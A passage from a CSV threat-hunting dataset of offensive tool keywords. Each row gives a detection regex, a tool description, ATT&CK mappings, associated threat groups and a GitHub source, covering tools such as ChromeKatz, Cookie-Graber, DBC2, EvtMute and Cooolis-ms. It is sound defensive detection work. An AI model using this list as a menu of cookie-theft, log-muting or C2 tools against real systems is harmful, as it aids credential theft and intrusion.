Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38825" "*ConvertTo-Shellcode.ps1*",".{0,1000}ConvertTo\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","38826" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","38827" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38828" "*cookie_graber_x64.o*",".{0,1000}cookie_graber_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38829" "*cookie-graber.c*",".{0,1000}cookie\-graber\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38830" "*cookie-graber_x64.exe*",".{0,1000}cookie\-graber_x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38831" "*Cookie-Graber-BOF*",".{0,1000}Cookie\-Graber\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38832" "*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38833" "*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38834" "*cookie-katz edge *",".{0,1000}cookie\-katz\sedge\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38835" "*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38836" "*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38837" "*cookie-katz webview *",".{0,1000}cookie\-katz\swebview\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38838" "*CookieKatz.exe*",".{0,1000}CookieKatz\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38839" "*CookieKatzBOF.cpp*",".{0,1000}CookieKatzBOF\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38840" 
"*CookieKatzBOF.x64*",".{0,1000}CookieKatzBOF\.x64.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38841" "*CookieKatzBOF.zip*",".{0,1000}CookieKatzBOF\.zip.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38842" "*CookieKatzMinidump.exe*",".{0,1000}CookieKatzMinidump\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38843" "*CookieProcessor.exe*",".{0,1000}CookieProcessor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","38844" "*Cookies stolen and saved successfully!""",".{0,1000}Cookies\sstolen\sand\ssaved\ssuccessfully!\""","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","38845" "*cooking A replies to point to * matching: *",".{0,1000}cooking\sA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38846" "*cooking AAAA replies to point to * matching: *",".{0,1000}cooking\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38847" "*cooking all A replies to point to *",".{0,1000}cooking\sall\sA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38848" "*cooking all AAAA replies to point to *",".{0,1000}cooking\sall\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38849" "*cooking all CNAME replies to point to *",".{0,1000}cooking\sall\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38850" "*cooking all MX replies to point to *",".{0,1000}cooking\sall\sMX\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38851" "*cooking all NS replies to point to *",".{0,1000}cooking\sall\sNS\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38852" "*cooking CNAME replies to point to * matching: *",".{0,1000}cooking\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38853" "*cooking MX replies to point to * matching: *",".{0,1000}cooking\sMX\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38854" "*cooking NS replies to point to * matching: *",".{0,1000}cooking\sNS\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","38855" "*cool*/cool.zip*",".{0,1000}cool.{0,1000}\/cool\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","38856" "*CoolerVoid/0d1n*",".{0,1000}CoolerVoid\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","38857" "*coolv0.1.exe*",".{0,1000}coolv0\.1\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","38858" "*Cooolis*shellcode*",".{0,1000}Cooolis.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. 
and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38859" "*CooolisAdjustTokenPrivileges*",".{0,1000}CooolisAdjustTokenPrivileges.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38860" "*CooolisCreateRemoteThread*",".{0,1000}CooolisCreateRemoteThread.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38861" "*Cooolis-ExternalC2*",".{0,1000}Cooolis\-ExternalC2.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38862" "*Cooolis-ms.exe*",".{0,1000}Cooolis\-ms\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38863" "*Cooolis-msf*",".{0,1000}Cooolis\-msf.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
